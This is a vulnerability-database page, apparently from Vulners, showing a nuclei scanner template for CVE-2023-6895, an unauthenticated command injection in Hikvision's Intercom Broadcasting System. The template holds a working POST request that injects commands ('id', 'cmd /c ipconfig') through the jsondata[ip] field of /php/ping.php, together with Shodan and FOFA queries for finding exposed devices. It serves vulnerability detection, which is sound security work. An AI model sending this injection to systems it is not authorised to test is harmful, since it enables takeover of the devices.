Lucene search
K

Hikvision IP ping.php - Command Execution

🗓️ 28 Jun 2026 15:08:32Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 329 Views

Hikvision IP ping.php command execution vulnerabilit

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for OS Command Injection in Hikvision Intercom_Broadcast_System
7 Feb 202409:28
githubexploit
Circl
CVE-2023-6895
18 Dec 202315:47
circl
CNNVD
Hikvision Intercom Broadcasting System Operating System Command Injection Vulnerability
17 Dec 202300:00
cnnvd
CVE
CVE-2023-6895
17 Dec 202308:00
cve
Cvelist
CVE-2023-6895 Hikvision Intercom Broadcasting System ping.php os command injection
17 Dec 202308:00
cvelist
NVD
CVE-2023-6895
17 Dec 202308:15
nvd
OSV
CVE-2023-6895
17 Dec 202308:15
osv
Prion
Command injection
17 Dec 202308:15
prion
Positive Technologies
PT-2023-32805
17 Dec 202300:00
ptsecurity
RedhatCVE
CVE-2023-6895
23 May 202502:07
redhatcve
Rows per page
id: CVE-2023-6895

info:
  name: Hikvision IP ping.php - Command Execution
  author: DhiyaneshDk,archer
  severity: critical
  description: |
    A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability.
  impact: |
    Unauthenticated attackers can execute arbitrary operating system commands via the jsondata[ip] parameter, potentially gaining complete control over the Hikvision Intercom Broadcasting System.
  remediation: |
    Upgrade to Hikvision Intercom Broadcasting System version 4.1.0 or later.
  reference:
    - https://vuldb.com/?ctiid.248254
    - https://vuldb.com/?id.248254
    - https://github.com/tanjiti/sec_profile
    - https://github.com/wy876/POC
    - https://github.com/xingchennb/POC-
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-6895
    cwe-id: CWE-78
    epss-score: 0.89138
    epss-percentile: 0.99763
    cpe: cpe:2.3:o:hikvision:intercom_broadcast_system:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: hikvision
    product: intercom_broadcast_system
    shodan-query: http.favicon.hash:"-1830859634"
    fofa-query: "icon_hash=\"-1830859634\""
  tags: cve,cve2023,hikvision,rce,vuln,vkev

http:
  - method: POST
    path:
      - "{{BaseURL}}/php/ping.php"
    body: "jsondata%5Btype%5D=99&jsondata%5Bip%5D={{command}}"
    headers:
      Content-Type: "application/x-www-form-urlencoded"

    payloads:
      command:
        - 'id'
        - 'cmd /c ipconfig'

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "Windows IP"
          - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
        condition: or

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a0046304402205f64b203da99cac173026d0a1b0f5dc9a782abf4058161bb43a808796723ed90022074601ccceab9cc6b30267bcd245df57c711f7eafe13b232d404834bcd236b6b6:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 3.16.3 - 9.8
CVSS 25.8
CVSS 36.3
EPSS0.89138
SSVC
329